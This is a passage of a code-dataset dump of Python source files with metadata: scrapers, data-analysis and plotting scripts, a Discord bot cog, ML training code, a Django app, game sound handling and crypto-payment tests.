pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef league_info(url):\n \"\"\"\n 解析league url获取每个赛季的详细信息\n :param url: league url\n :return: 每个赛季的详细信息\n \"\"\"\n request = requests.get(url)\n tables = BeautifulSoup(request.text, \"html.parser\").find_all('table')\n for table in tables:\n if table.has_key('id'):\n head = table.find_all('tr')[1]\n headers = head.find_all('th')\n headers = [th.text for th in headers]\n columns = headers + ['seasonURL', 'lgURL']\n\n # print(columns)\n teams = pd.DataFrame(columns=columns)\n\n for key in table.find_all('tr')[2:]:\n tdValues = key.find_all('td')\n\n aURs = key.find_all('a')\n SeasonURL = ''\n lgURL = ''\n if len(aURs) >= 2:\n SeasonURL = aURs[0]['href']\n lgURL = aURs[1]['href']\n\n thValues = key.find_all('th')\n season = ''\n if len(thValues) >= 1:\n season = thValues[0].text\n\n def get_team(teamvalues):\n array = np.zeros(len(teamvalues), dtype=object)\n for i, value in enumerate(teamvalues):\n array[i] = value.text.replace('\\n', '\\t')\n return array\n\n tdTeam = np.concatenate((np.array([season]), get_team(tdValues), np.array([SeasonURL, lgURL])))\n\n if tdTeam.size != len(columns):\n continue\n teamArray = tdTeam.reshape(1, len(columns))\n team = pd.DataFrame(teamArray, columns=columns)\n teams = teams.append(team)\n\n teams = teams.set_index(columns[0])\n # print(teams)\n teams.to_csv(\"../data/league/league.details\", encoding='utf-8')\n\n\ndef main(argv):\n \"\"\"The main method for this module.\n \"\"\"\n league_info(argv[0])\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])","sub_path":"crawl/league_details.py","file_name":"league_details.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"367708548","text":"\"\"\"Plot coherence across subjects.\"\"\"\nimport numpy as np\nimport pandas as pd\n\nfrom brainpipe.system import Study\nfrom brainpipe.connectivity import concat_connect, remove_site_contact\n\nfrom visbrain.objects import (ConnectObj, SceneObj, SourceObj, BrainObj,\n ImageObj, RoiObj)\nfrom visbrain.gui import Brain\n\n\n\n###############################################################################\ncond = ('win-5120', 'REST1')\nviews = ['top', 'left']\nmin_nb_connect = 1\n###############################################################################\n\nst = Study('DMN-CORR')\ncoh_files = st.search(*cond, folder='coherence', full_path=False)\n\n\nconnect, mask, xyz, dfs = [], [], [], []\nfor f in coh_files:\n print('******************************************************************')\n print('Loading %s' % f)\n print('******************************************************************')\n suj = f.split('_')[0]\n\n # if suj == 'DB':\n # print(' SUBJECT DB IGNORED BECAUSE OF IMPLANTATION.')\n # continue\n\n # Load channels and xyz :\n print(\" Load channels, anatomy and coordinates of subject %s\" % suj)\n _chan = st.load('%s_channels.npy' % suj, folder='channels')\n _xyz = st.load('%s_xyz.npy' % suj, folder='xyz')\n xyz += [_xyz]\n dfs += [st.load('%s_anat.xlsx' % suj, folder='anatomy')]\n\n # Load coherence\n print(\" Load coherence of subject %s\" % suj)\n arch = st.load(f, folder='coherence')\n _connect, freqs = np.squeeze(arch['connect'])[..., 0].T, arch['freqs']\n connect += [np.real(_connect)]\n mask += [remove_site_contact(_connect, _chan)]\n\nprint(\"Concatenate xyz, connect, mask and anatomy\")\nxyz = np.concatenate(xyz, axis=0)\nconnect = concat_connect(connect)\nmask_contact = concat_connect(mask).astype(bool)\nmask_under = connect < .5\nmask = (mask_contact) | (mask_under)\nconnect = np.ma.masked_array(connect, mask=mask)\ndf = pd.concat(dfs)\ndf.index = pd.RangeIndex(len(df.index))\nprint(xyz.shape, connect.shape)\n\nprint(\"Get the number of connections per node :\")\nc_nb = ConnectObj('s', xyz, connect)\ndata = c_nb.get_nb_connections_per_node()[:, 1]\nc_r, labels, dfc = c_nb.analyse_connections('mist_ROI', group_by='name_ROI',\n get_centroids=True)\nxyz_r = np.array(dfc[['X', 'Y', 'Z']])\n\n\nprint(\"Remove sites with too less nb of connections per nodes\")\nrm_lines = np.where(data < min_nb_connect)[0]\nxyz = np.delete(xyz, rm_lines, axis=0)\nconnect = np.delete(connect, rm_lines, axis=0)\nconnect = np.delete(connect, rm_lines, axis=1)\nmask = np.delete(mask, rm_lines, axis=0)\nmask = np.delete(mask, rm_lines, axis=1)\ndf.drop(rm_lines, inplace=True)\ndf.index = pd.RangeIndex(len(df.index))\n\ngroups = df.groupby('name_ROI').groups\nlabels = [k for k, i in groups.items() if len(i) > 2]\nif 'Not_found' in labels:\n labels.pop(labels.index('Not found'))\nroi_obj = RoiObj('mist_ROI')\nindex = roi_obj.where_is(labels, exact=True, case_sensitive=False, union=True)\n\nconnect = np.ma.masked_array(connect, mask=mask)\n\nsc = SceneObj(bgcolor='white')\n\nfor k, v in enumerate(views):\n c_obj = ConnectObj('s', xyz, connect, antialias=True)\n data = c_obj.get_nb_connections_per_node()[:, 1]\n s_obj = SourceObj('s', xyz, alpha=.3, data=data, radius_min=0,\n radius_max=20)\n s_obj.color_sources(data=data)\n\n sc.add_to_subplot(s_obj, col=k)\n sc.add_to_subplot(c_obj, col=k)\n sc.add_to_subplot(BrainObj('B3'), rotate=v, use_this_cam=True, col=k)\n\n cr_obj = ConnectObj('r', xyz_r, c_r, antialias=True, line_width=10.)\n data_r = cr_obj.get_nb_connections_per_node()[:, 1]\n sr_obj = SourceObj('s', xyz_r, alpha=.3, data=data_r, radius_min=0,\n radius_max=20)\n sc.add_to_subplot(sr_obj, col=k, row=1)\n sc.add_to_subplot(cr_obj, col=k, row=1)\n sc.add_to_subplot(BrainObj('B3'), rotate=v, use_this_cam=True, col=k,\n row=1)\n\nsc.preview()\n\n","sub_path":"DMN-corr/02_plot/coherence/plot_coherence_across_subjects.py","file_name":"plot_coherence_across_subjects.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"62142900","text":"from discord.ext import commands\nimport random\n\nclass Random(commands.Cog, name=\"Random Cog\"):\n \"\"\"Receives ping commands\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.command()\n async def roll(self, ctx: commands.Context, dice: str):\n \"\"\"Checks for a response from the bot\"\"\"\n try:\n rolls = \"\"\n amount, die = dice.split(\"d\")\n for _ in range(int(amount)):\n roll = random.randint(1, int(die))\n rolls += f\"{roll} \"\n await ctx.send(rolls)\n except ValueError:\n await ctx.send(\"Dice must be in the format _d_ (example: 2d6)\")\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Random(bot))","sub_path":"modules/random/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"484283192","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 15 20:56:50 2019\n\n@author: Maureen\n\n\"\"\"\n\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import PredefinedSplit\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import mean_squared_log_error\nfrom sklearn.metrics import mean_squared_error\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\n\nimport warnings\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\ndef index_splitter(N, fold):\n index_split = []\n test_num = int(N/fold)\n train_num = N-test_num\n\n for i in range(0,train_num):\n index_split.append(-1)\n\n for i in range(train_num,N):\n index_split.append(0)\n\n return index_split\n\n\n# Number of trees in random forest\ndef gb(X, Y, kfold=3, feature_set=None):\n \n arr = index_splitter(N = len(X), fold = kfold)\n ps = PredefinedSplit(arr)\n\n for train, test in ps.split():\n train_index = train\n test_index = test\n\n train_X, train_y = X.values[train_index,:], Y.values[train_index]\n test_X, test_y = X.values[test_index,:], Y.values[test_index]\n arr = index_splitter(N = len(train_X), fold = kfold)\n ps2 = PredefinedSplit(arr)\n \n \n gb = GradientBoostingRegressor(random_state = 42)\n print('Base parameter:')\n print(gb.get_params())\n gb.fit(train_X, train_y)\n \n\n #grid search\n lr_log = np.linspace(-8,5,14)\n\n lr = []\n for i in lr_log:\n a = math.pow(10,i)\n lr = lr + [a]\n \n n_estimators = [int(x) for x in range(20,200,20)] #[int(x) for x in np.linspace(start = 10, stop = 200, num = 50)]\n # Maximum number of levels in tree\n max_depth = [3, 5, 10, 20, 50]\n # Minimum number of samples required to split a node\n #min_samples_split = [2, 5, 10]\n # Minimum number of samples required at each leaf node\n #min_samples_leaf = [1, 2, 4]\n\n\n # Create the random grid\n grid_grid = {'learning_rate' : lr,\n 'n_estimators': n_estimators,\n 'max_depth': max_depth,\n #'min_samples_split': min_samples_split,\n #'min_samples_leaf': min_samples_leaf,\n }\n \n \n gb_grid = GridSearchCV(estimator=gb, param_grid=grid_grid, scoring='neg_mean_squared_error', cv = ps2.split(), verbose=2, n_jobs=-1)\n gb_grid.fit(train_X, train_y)\n BestPara_grid = gb_grid.best_params_\n print('Grid parameter:')\n print(gb_grid.best_params_)\n\n\n # Number of trees in random forest\n lr_unit = BestPara_grid['learning_rate']\n lr = [x for x in np.linspace(start = lr_unit, stop = lr_unit*9, num = 9)]\n \n ets_unit = BestPara_grid['n_estimators']\n n_estimators = [int(x) for x in range(ets_unit - 20, ets_unit + 20, 5)]\n \n max_depth = [BestPara_grid[\"max_depth\"]]\n \n '''\n # Minimum number of samples required to split a node\n min_samples_split = []\n for x in range(BestPara_grid[\"min_samples_split\"]-2,BestPara_grid[\"min_samples_split\"]+2,1):\n if x>1:\n min_samples_split.append(int(x))\n \n # Minimum number of samples required at each leaf node\n min_samples_leaf = []\n \n for x in range(BestPara_grid[\"min_samples_leaf\"]-1,BestPara_grid[\"min_samples_leaf\"]+1,1):\n if x>0:\n min_samples_leaf.append(int(x))\n '''\n # Create the random grid\n grid_grid2 = {'learning_rate' : lr,\n 'n_estimators': n_estimators,\n 'max_depth': max_depth,\n #'min_samples_split': min_samples_split,\n #'min_samples_leaf': min_samples_leaf,\n }\n \n gb_grid2 = GridSearchCV(estimator=gb, param_grid=grid_grid2, scoring='neg_mean_squared_error', cv = ps2.split(), verbose=2, n_jobs=-1)\n \n # Fit the grid search model\n gb_grid2.fit(train_X, train_y)\n BestPara_grid = gb_grid2.best_params_\n print(gb_grid2.best_params_)\n\n\n #prediction\n predict_y=gb_grid2.predict(test_X)\n predict_y_grid=gb_grid.predict(test_X)\n predict_y_base=gb.predict(test_X)\n \n \n #RMSE\n errors_baseline = np.sqrt(mean_squared_error(predict_y_base,test_y))\n errors_Grid_CV = np.sqrt(mean_squared_error(predict_y_grid,test_y))\n errors_Grid2_CV = np.sqrt(mean_squared_error(predict_y,test_y))\n\n results = [errors_baseline, errors_Grid_CV, errors_Grid2_CV]\n\n print('gradient boost results:',results)\n\n return gb_grid2.best_estimator_, results, gb_grid2.best_params_\n","sub_path":"Refactor3/model/gb_model.py","file_name":"gb_model.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"10427989","text":"import random\n\ndef multiply(numbers,val):\n if not numbers[1:]: return val*numbers[0]\n return multiply(numbers[1:],val*numbers[0])\n\nclass GridTraversal:\n\n def __init__(self, grid_file = None,dimensions=20,seed=50):\n if grid_file:\n with open('grid.txt') as grid:\n self.grid = [e.strip('\\n').split() for e in grid.readlines()]\n else:\n self.grid = self.generate_grid(dimensions,seed)\n self.seed = seed\n self.grid_coords = [(i,j) for i in range(len(self.grid)) for j in range(len(self.grid))]\n self.directions = ['up','up right','right','down right',\n 'down','down left','left','up left']\n\n def generate_grid(self,dimensions,s):\n random.seed(s)\n return [[str(random.randint(0,100)) for _ in range(dimensions)] for _ in range(dimensions)]\n\n def get_numbers(self,x,y,path,direction,of_length):\n ## print(path)\n if of_length >= len(self.grid) or of_length >= len(self.grid[0]):\n return False\n if direction == 'up' and path == [] and x >= of_length-1:\n return self.get_numbers(x-1,y,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'up' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x-1,y,path+[self.grid[x][y]],direction,of_length)\n \n if direction == 'up right' and path == [] and x >= of_length-1 and y <= len(self.grid[-1]) - of_length:\n return self.get_numbers(x-1,y+1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'up right' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x-1,y+1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'right' and path == [] and y <= len(self.grid[-1]) - of_length:\n return self.get_numbers(x,y+1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'right' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x,y+1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'down right' and path == [] and x <= len(self.grid[-1]) - of_length and y <= len(self.grid[-1]) - of_length:\n return self.get_numbers(x+1,y+1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'down right' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x+1,y+1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'down' and path == [] and x <= len(self.grid[-1]) - of_length:\n return self.get_numbers(x+1,y,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'down' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x+1,y,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'down left' and path == [] and x <= len(self.grid[-1]) - of_length and y >= of_length-1:\n return self.get_numbers(x+1,y-1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'down left' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x+1,y-1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'left' and path == [] and x >= of_length-1:\n return self.get_numbers(x,y-1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'left' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x,y-1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'up left' and path == [] and x >= of_length-1 and y >= of_length-1:\n return self.get_numbers(x-1,y-1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'up left' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x-1,y-1,path+[self.grid[x][y]],direction,of_length)\n\n def get_all_possible_paths(self,length=4):\n paths_dict = {}\n for cell in self.grid_coords:\n x,y = cell\n directions_dict = {}\n for d in self.directions:\n path = self.get_numbers(x,y,[],d,length)\n directions_dict[d] = path\n paths_dict[(self.grid[cell[0]][cell[1]],cell)] = directions_dict\n return paths_dict\n\n def print_current_grid(self):\n with open('grid_'+str(self.seed)+'.txt','w') as grid:\n for line in self.grid:\n print(' '.join(line),file=grid)\n\ntraversal = GridTraversal(dimensions=250)\npossible_paths = traversal.get_all_possible_paths(length=86)\nmax_product = max([(multiply([int(i) for i in e],1),e,k1[1],k2) for k1,v in possible_paths.items() for k2,e in v.items() if e],key=lambda x:x[0])\n\nprint('The max product is: ',max_product[0])\nprint('The path is: ',max_product[1])\nprint('The start position is: ',max_product[2])\nprint('In the direction: ',max_product[3])\n","sub_path":"Question 11/q11.py","file_name":"q11.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"38168891","text":"from CryptoPayment import CryptoPayment, convert\nfrom tinydb import TinyDB, where\nimport time\nimport threading\n\nif __name__ == '__main__':\n cch = CryptoPayment(test=True)\n cch.clearDB() \n cch.wallet_refresh_time = 0\n test_wallet_type = 'litecoin'\n\n test_results = {\n 'creating_wallets': None,\n 'deleting_wallets': None,\n 'creating_transactions': None,\n 'deleting_transactions': None,\n 'checking_transactions': None,\n 'display_tethered_transactions': None\n\n }\n # user may add wallets to the system\n wallet_list = ['0x1231kasd', '0x231231skdasd', '0x1231kasdcxzcas234']\n for wallet in wallet_list:\n try:\n cch.addWallet(wallet, test_wallet_type)\n except:\n pass\n \n\n test_wallet_list = cch.showWallets()\n if len(wallet_list) == len(test_wallet_list):\n print('!!creates wallets as usual')\n test_results['creating_wallets'] = True\n else:\n print(f'!#!expected to get {len(wallet_list)} instead of {len(test_wallet_list)}')\n test_results['creating_wallets'] = False\n\n # new transaction check\n workers_list = []\n for t in range(2):\n for i in range(3):\n worker = threading.Thread(target=cch.newTransaction, args=(test_wallet_type, 1.0242134))\n worker.start()\n workers_list.append(worker)\n for worker in workers_list:\n worker.join()\n\n transactions = cch.active_transactions.all()\n transactions_failures = 0\n for transaction in transactions:\n if len(list(filter( lambda x: x['protocol_units'] == transaction['protocol_units'] and x['wallet_adr'] == transaction['wallet_adr'], transactions))) != 1:\n print('number of transactions are not equal to 1')\n transactions_failures+=1\n \n if transactions_failures == 0:\n print('!!transactions are creating succesfully')\n test_results['creating_transactions'] = True\n else:\n print('!#!some troubles happend on creating transactions')\n test_results['creating_transactions'] = False\n\n # transactions may be aborted\n previous_amount_of_transactions = len(transactions)\n cch.deleteTransaction(transactions[0]['pk'])\n transactions = cch.active_transactions.all()\n if previous_amount_of_transactions > len(transactions):\n print('!!removes transactions as usual')\n test_results['deleting_transactions'] = True\n else:\n print('!!got an error while was removing transactions')\n test_results['deleting_transactions'] = False\n\n #user may remove wallets from the system\n cch.deleteWallet(wallet_list[0])\n test_wallet_list = cch.showWallets()\n if len(wallet_list) == len(test_wallet_list)+1:\n print('!!removes wallets as usual')\n test_results['deleting_wallets'] = True\n\n else:\n print(f'expected to get {len(wallet_list)} instead of {len(test_wallet_list)+1}')\n test_results['deleting_wallets'] = False\n\n #check transaction\n transaction = cch.active_transactions.all()[0]\n result1 = cch.checkActiveTransaction(transaction['pk'])\n time.sleep(1)\n if len( cch.finished_transactions.search(where('wallet_adr') == transaction['wallet_adr']) ) != 0:\n print(f'some of the transactions were marked as finished, none of the transactions supposed to be finished')\n # check if any of the current transaction is finished\n result2 = cch.checkActiveTransaction(transaction['pk'])\n if result1 is False and result2 is True:\n print(f'!!checking transaction test passed')\n else:\n print(f'!#!checking transaction test failed')\n time.sleep(2)\n\n # add a new transaction\n test_protocol_units = convert(test_wallet_type, protocol_units=cch.checker.test_transactions[-1]['balance_change'])\n test_new_transaction = cch.newTransaction(test_wallet_type, test_protocol_units)\n # check it, must be false\n transaction_result = cch.checkActiveTransaction(test_new_transaction['pk'])\n \n \n # showTetheredTransactions\n results = cch.showTetheredTransactions(test_new_transaction['wallet_adr'],test_wallet_type)\n if len(list(filter(lambda transaction: transaction['tethered_transaction'] != [], results))) > 0:\n print(f'showTetheredTransactions seems to be working as usual')\n else:\n print(f'showTetheredTransactions seems to have some troubles')\n\n # erase db\n cch.clearDB() \n print('tests finished')\n print(test_results)\n\n# test_transaction = {\"currency\":\"usdt\", 'amount': 100.00}\n# test_transaction2 = {\"currency\":\"usdt\", 'amount': 102.00}\n# test_results = []\n# for i in range(12):\n# test_results.append(registerReplenish(test_transaction) )\n# for i in range(14):\n# test_results.append(registerReplenish(test_transaction2) )\n# for i in test_results:\n# print(i)\n\n# deleteWallet(wallet_adr='', wallet_type=''):\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"321958498","text":"#!/usr/bin/python3\n\"\"\" Contains a function that divides all elements of a matrix. \"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\" Divides all elements of a matrix \"\"\"\n if type(matrix) is not list:\n raise TypeError(\"matrix must be a matrix \\\n(list of lists) of integers/floats\")\n for e in matrix:\n if type(e) is not list:\n raise TypeError(\"matrix must be a matrix \\\n(list of lists) of integers/floats\")\n l = len(matrix[0])\n if len(e) != l:\n raise TypeError(\"Each row of the matrix must have the same size\")\n for i in e:\n if type(i) is not int and type(i) is not float:\n raise TypeError(\"matrix must be a matrix \\\n(list of lists) of integers/floats\")\n if type(div) is not int and type(div) is not float:\n raise TypeError(\"div must be a number\")\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n\n return list(map(lambda y: list(map(lambda\n x: round(x / div, 2), y)), matrix))\n","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"307480494","text":"import pygame\nimport Game\nimport time\n\n\nclass SoundSystem:\n def __init__(self):\n self.volume = 100\n\n self.Startup = 'res/Sounds/Startup.wav'\n\n self.Music = 'res/Sounds/Music.wav'\n\n self.Attack = 'res/Sounds/Attack.wav'\n self.Mine = 'res/Sounds/Mine.wav'\n self.Moving = 'res/Sounds/Moving.wav'\n self.Error = 'res/Sounds/Error.wav'\n self.Click = 'res/Sounds/Click.wav'\n self.Victory = 'res/Sounds/Victory.wav'\n self.Card = 'res/Sounds/Card.wav'\n self.Mine_disabled = 'res/Sounds/Mine_disabled.wav'\n self.Heal = 'res/Sounds/Heal.wav'\n self.Emp = 'res/Sounds/Emp.wav'\n self.Fuel = 'res/Sounds/Fuel.wav'\n self.Place_mine = 'res/Sounds/Place_mine.wav'\n self.Ship_destroyed = 'res/Sounds/Ship_destroyed.wav'\n\n self.Music = 'res/Sounds/Music.wav'\n\n def play(self, sound):\n Game.Thread.create(self.play_asynch, [sound])\n\n def play_asynch(self, sound):\n sound = pygame.mixer.Sound(sound)\n sound.set_volume(self.volume / 100)\n sound.play()\n while pygame.mixer.get_busy() and not Game.EXIT:\n time.sleep(1 / 30)\n sound.set_volume(self.volume / 100)\n\n def loop(self, sound, t):\n Game.Thread.create(self.loop_asynch, [sound, t])\n\n def loop_asynch(self, sound, t):\n sound = pygame.mixer.Sound(sound)\n sound.set_volume(self.volume / 100)\n sound.play(-1)\n while pygame.mixer.get_busy() and not Game.EXIT:\n time.sleep(1 / 30)\n sound.set_volume(self.volume / 100)\n if t():\n sound.fadeout(1 * 1000)\n\n def getVolume(self):\n return self.volume\n\n def setVolume(self, volume):\n self.volume = volume\n","sub_path":"Sound/SoundSystem.py","file_name":"SoundSystem.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"206648727","text":"from django.urls import path\n\n\nfrom . import views\n\n\n#specifying app name (it can be used as 'football:homepage')\n\napp_name='football'\n\nurlpatterns = [\n path('' , views.HomePageView.as_view() , name='homepage'),\n path('players/' , views.PlayerList.as_view() , name='players'),\n path('clubs/' ,views.ClubList.as_view() ,name='clubs'),\n \n\n]\n\n\n","sub_path":"football/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"301367114","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('text', models.TextField(null=True)),\n ('pub_date', models.DateTimeField(verbose_name='date published', null=True)),\n ('moderation_requered', models.BooleanField(default=False)),\n ('author', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Guestbook',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('name', models.CharField(max_length=200)),\n ('url', models.SlugField()),\n ('premoderation', models.BooleanField(default=True)),\n ('pub_date', models.DateTimeField(verbose_name='date published', null=True)),\n ('author', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.AddField(\n model_name='comment',\n name='guestbook',\n field=models.ForeignKey(to='guestbook.Guestbook'),\n ),\n ]\n","sub_path":"guestbook_holder/guestbook/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"504180260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 22 12:55:06 2017\n\n@author: PaulJ\n\"\"\"\nimport pandas as pd\nimport os\n\n\ndef findAllZeroDistFiles(aDir=\".\",\n dataSaveFile=\"filesWithDist.csv\",\n verbose=False):\n allExFilesDistSummary = pd.DataFrame()\n noFiles = len(os.listdir(aDir))\n printInc = int(noFiles/10)\n lineNo = 0\n for sourcefilename in os.listdir(aDir):\n lineNo = lineNo + 1\n if lineNo % printInc == 0:\n print(\"Summarizing distance in file\", lineNo, \"of\", noFiles, end=\"\")\n print(\":\", sourcefilename)\n sourceDirFilename = aDir + \"\\\\\\\\\" + sourcefilename\n if not sourcefilename[-4:].lower()==\".csv\":\n continue\n #print(\"Distance summing\", sourcefilename)\n theExHist = pd.read_csv(sourceDirFilename,\n index_col=False)\n totdist = float(theExHist.iloc[len(theExHist)-1]['distance'])\n \n fileAndDist = pd.Series(data=[sourceDirFilename, totdist],\n index=[\"filename\", \"distance\"])\n allExFilesDistSummary = allExFilesDistSummary.append(fileAndDist,\n ignore_index=True)\n \n allExFilesDistSummary = allExFilesDistSummary.sort_values(by='distance',\n ascending=True)\n \n zeroCount = len(allExFilesDistSummary[allExFilesDistSummary.distance == 0])\n \n allExFilesDistSummary.to_csv(path_or_buf=dataSaveFile)\n \n zeroDistFileList = allExFilesDistSummary[allExFilesDistSummary.distance == 0]\n zeroDistFileList = zeroDistFileList.sort_values(by='filename',\n ascending=True)\n \n zeroDataSaveFilename = dataSaveFile[:-4] + \"_Zero.csv\"\n zeroDistFileList.to_csv(path_or_buf=zeroDataSaveFilename)\n \n return len(allExFilesDistSummary), zeroCount\n\n\nif __name__ == '__main__':\n totalFiles, zeroFiles = findAllZeroDistFiles(aDir=\"ExerciseData\",\n dataSaveFile=\"FilesWithDist_try3.csv\",\n verbose=True)\n print(totalFiles, \"files checked for distance.\",\n zeroFiles, \"found with zero distance\")","sub_path":"Archive Code/FindZeroDistExerciseFiles.py","file_name":"FindZeroDistExerciseFiles.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"148909985","text":"import logging\nimport os\nimport pickle\nimport sys\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\n\ntry:\n from .config import get_config\n from .SoSmodel import SoSModel\n from .session_sequence import create_dataset\n from .session_iterator import BatchIterator\nexcept SystemError: # pragma: no cover\n from config import get_config\n from SoSmodel import SoSModel\n from session_sequence import create_dataset\n from session_iterator import BatchIterator\n\n\nlogging.basicConfig(level=logging.INFO)\ntf.logging.set_verbosity(tf.logging.ERROR)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nif __name__ == '__main__':\n logger = logging.getLogger(__name__)\n try:\n if 'LOG_LEVEL' in os.environ and os.environ['LOG_LEVEL'] != '':\n logger.setLevel(os.environ['LOG_LEVEL'])\n except Exception as e:\n logger.error(\n 'Unable to set logging level because: {0} defaulting to INFO.'.format(str(e)))\n\n # Load info from config\n config = get_config()\n time_const = config['time constant']\n rnn_size = config['rnn size']\n labels = config['labels']\n\n # Path to training data\n data_dir = sys.argv[1]\n # Create the training data\n if len(sys.argv) == 3:\n data = create_dataset(data_dir, time_const)\n write_dir = sys.argv[2]\n logger.info('Saving data to %s', write_dir)\n with open(write_dir, 'wb') as handle:\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\n else:\n data = data_dir\n\n logger.info('Loaded training data')\n # Create an iterator\n iterator = BatchIterator(\n data,\n labels,\n perturb_types=['random data', 'port swap', 'direction_swap']\n )\n logger.info('Created iterator')\n rnnmodel = SoSModel(rnn_size=100, label_size=len(labels))\n logger.info('Created model')\n try:\n rnnmodel.load('/models/SoSmodel')\n logger.info('Loaded model')\n except Exception as e:\n rnnmodel.initialize()\n logger.info('Initialized model')\n\n X_v, L_v, Y_v = iterator.gen_batch(\n split='validation',\n batch_size=64\n )\n\n cost = rnnmodel.get_cost(X_v, L_v, Y_v)\n out = rnnmodel.get_output(X_v, L_v)\n\n logger.info('Initial validation cost: %s', np.mean(cost))\n min_cost = cost\n last_save = 0\n for i in range(100000):\n tick = time.clock()\n X, L, Y = iterator.gen_batch(\n split='train',\n batch_size=64\n )\n tock = time.clock()\n _ = rnnmodel.train_on_batch(X, L, Y)\n if (i+1) % 100 == 0:\n cost = rnnmodel.get_cost(X_v, L_v, Y_v)\n logger.info('Validation cost after %s batches: %s', i, cost)\n if cost < min_cost:\n min_cost = cost\n rnnmodel.save('/new_models/SoSmodel')\n last_save = 0\n logger.info('Saving model at validation cost %s', cost)\n else:\n last_save += 100\n if last_save > 1000:\n logger.info('No improvement after 1000 iterations. Stopping.')\n break\n","sub_path":"utils/train_SoSModel.py","file_name":"train_SoSModel.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"103460620","text":"import pygame\n\nclass MusicApp:\n\n def __init__(self, *args):\n self.playlist = []\n self.songs = []\n for song in args:\n self.songs.append(song)\n pygame.mixer.init(frequency=26050,size=-16,channels=2,buffer=4096)\n self.offset = 0\n self.play = False\n self.playable = False\n self.pos = 0\n self.offset = 0\n self.length = 1\n self.songName = None\n\n def playSong(self,song: str,pos:int):\n pygame.mixer.music.stop()\n pygame.mixer.music.play(song,pos)\n if self.playing:\n pygame.mixer.music.pause()\n self.songName = song\n self.offset = pos*1000\n\n\n def 